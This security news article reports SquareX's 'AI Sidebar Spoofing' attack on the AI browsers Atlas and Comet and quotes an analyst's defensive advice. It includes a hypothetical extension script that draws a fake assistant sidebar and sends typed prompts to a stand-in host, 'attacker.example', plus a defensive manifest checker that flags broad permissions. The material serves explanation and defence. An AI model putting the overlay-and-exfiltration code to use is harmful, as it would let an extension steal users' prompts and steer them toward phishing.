AI Browsers Atlas and Comet Found Vulnerable to Sidebar Spoofing Attacks
- Cyber Jill
Researchers have uncovered a new exploit that targets the AI-powered browsers Atlas by OpenAI and Comet by Perplexity, showing how attackers can create fake AI sidebars indistinguishable from the real interface to deliver malicious commands.
The vulnerability—dubbed AI Sidebar Spoofing—was demonstrated by cybersecurity firm SquareX, which found that a rogue browser extension could overlay a counterfeit sidebar capable of intercepting every user interaction. The spoof mimics the authentic AI assistant UI so convincingly that victims may unknowingly follow harmful prompts, such as granting OAuth permissions, visiting phishing sites, or executing malicious scripts.
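SquareX has not published its proof-of-concept code, but the underlying technique is conceptually simple. The sketch below is a hypothetical content script, with invented element names and an invented attacker URL, illustrating how an extension granted broad host permissions could paint a convincing sidebar overlay and capture everything typed into it. It is not SquareX's actual exploit.

```typescript
// content-script.ts (hypothetical sketch, not SquareX's PoC):
// shows how a content script injected into every page could render
// a fake "AI sidebar" and intercept the user's prompts.

function injectFakeSidebar(): void {
  // A fixed-position panel styled to resemble a native AI assistant sidebar.
  const panel = document.createElement("div");
  panel.id = "ai-assistant-panel"; // invented, trusted-looking element name
  Object.assign(panel.style, {
    position: "fixed",
    top: "0",
    right: "0",
    width: "360px",
    height: "100vh",
    background: "#ffffff",
    borderLeft: "1px solid #ddd",
    zIndex: "2147483647", // maximum z-index keeps the overlay above page UI
    font: "14px system-ui",
  });

  const input = document.createElement("input");
  input.placeholder = "Ask anything...";
  panel.appendChild(input);

  // Every prompt typed into the fake sidebar is attacker-controlled: it can
  // be logged, rewritten, or answered with malicious "assistant" replies
  // (e.g., steering the victim toward a phishing URL or an OAuth grant).
  input.addEventListener("keydown", (e: KeyboardEvent) => {
    if (e.key === "Enter") {
      void fetch("https://attacker.example/collect", {
        method: "POST",
        body: JSON.stringify({ prompt: input.value, page: location.href }),
      });
    }
  });

  document.documentElement.appendChild(panel);
}

injectFakeSidebar();
```

For a script like this to run on every page, the extension's manifest would have to request a broad host pattern such as "<all_urls>", which is exactly the kind of permission request the recommendations quoted below single out for scrutiny.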
Both Atlas and Comet integrate large language models directly into the browsing experience, enabling users to summarize pages, run commands, and automate tasks. However, as SquareX’s findings reveal, that integration also broadens the potential attack surface by merging AI systems with browser-level trust.
Gabrielle Hempel, Security Operations Strategist at Exabeam, says this moment signals a critical inflection point for browser security:
“This incident is a warning shot for the early days of agentic browsing and a sign that the implicit trust model of the UI needs rethinking. The main issue here is that agentic-AI browsers introduce an entirely new attack surface. This attack, in which a malicious extension injects a fake AI sidebar overlay that looks like the real one, allows threat actors to hijack the ‘trusted’ AI assistant UI and trick users into executing dangerous operations. Organizations need to take this seriously because when you delegate browsing and actions to an AI sidebar, you are elevating what previously might have been a minor risk into a material risk to cloud assets, credentials, and devices.
Traditional controls will struggle with this because the spoof doesn’t rely on a conventional remote-code vulnerability; it exploits UI trust and overlay control via extension JavaScript injected into every page. Standard browser protections such as the same-origin policy and extension permission models are insufficient when an AI agent is operating with elevated context and acting on behalf of the user.
For organizations, it’s going to be important to restrict AI browser use for high-risk functions until these browsers are proven secure. Because the attack relies on an extension with host and storage permissions, organizations should also revisit their extension approval workflows for extensions that request such access. Any productivity tool that requests broad access should face scrutiny. Segmentation matters once these tools are deployed: least privilege applies here, and AI interaction with sensitive tabs and services should be limited.
For the industry, it’s going to be important to define security standards for these browsers. What constitutes an acceptable risk profile? How are agents audited? What logging and traceability are required when an agent executes actions for a user?”
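Hempel’s point about extension approval workflows can be made concrete. The sketch below is a hypothetical Node/TypeScript policy check, with invented rule descriptions, that flags the manifest permissions this class of attack depends on; a real approval workflow would layer checks like this onto store metadata, code review, and runtime monitoring.

```typescript
// audit-extension.ts (hypothetical sketch): a simple policy check an
// extension approval workflow might run against a submitted manifest.json.
import { readFileSync } from "node:fs";

// Host patterns that grant script injection into every page the user visits.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

interface Manifest {
  permissions?: string[];
  host_permissions?: string[];
  content_scripts?: { matches?: string[] }[];
}

function auditManifest(path: string): string[] {
  const m: Manifest = JSON.parse(readFileSync(path, "utf8"));
  const findings: string[] = [];

  // Collect injectable hosts from both MV3 host_permissions and
  // content_scripts match patterns.
  const hosts = [
    ...(m.host_permissions ?? []),
    ...(m.content_scripts ?? []).flatMap((cs) => cs.matches ?? []),
  ];
  if (hosts.some((h) => BROAD_HOSTS.has(h))) {
    findings.push("broad host access: can inject UI overlays into every page");
  }
  if ((m.permissions ?? []).includes("storage")) {
    findings.push("storage permission: can persist captured prompts or tokens");
  }
  return findings;
}

// Usage: npx ts-node audit-extension.ts path/to/manifest.json
const findings = auditManifest(process.argv[2] ?? "manifest.json");
console.log(findings.length ? findings.join("\n") : "no broad-permission flags");
```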
As AI becomes embedded deeper into browsing and productivity tools, Hempel’s warning underscores a growing realization: trust in the interface itself is now an attack vector. Until the ecosystem matures, experts recommend treating AI browsers as experimental—and limiting their access to sensitive data or accounts.